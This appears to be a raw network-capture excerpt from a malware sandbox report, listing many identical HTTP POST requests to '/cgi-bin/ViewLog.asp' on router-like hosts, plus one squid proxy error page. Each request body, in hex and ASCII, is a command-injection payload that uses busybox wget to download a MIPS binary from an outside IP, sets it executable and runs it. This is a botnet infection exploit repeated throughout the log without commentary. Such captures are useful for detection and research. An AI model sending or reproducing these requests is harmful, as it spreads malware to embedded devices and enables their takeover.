                                              Nov 23, 2023 05:16:23.437375069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              269192.168.2.144424431.136.110.138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:24.639868021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.653527021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:33.797261000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:45.828732014 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:10.915709019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.065646887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              270192.168.2.145485694.131.59.238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:24.676096916 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:24.935595036 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/6.0.0-20220501-re899e0c27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:16:24 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3572
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Cache-Status: ezproxies.com
                                              Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              271192.168.2.145259485.122.212.1998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:24.771276951 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              272192.168.2.143514862.103.75.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:25.523025036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.909496069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              273192.168.2.145820231.136.193.2148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:25.663250923 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:28.677529097 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:34.821340084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.852744102 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:10.915676117 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.065675974 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              274192.168.2.145481231.136.51.2128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:25.664036989 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:28.677515984 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:34.821434975 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:46.852730989 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:10.915684938 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.065646887 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
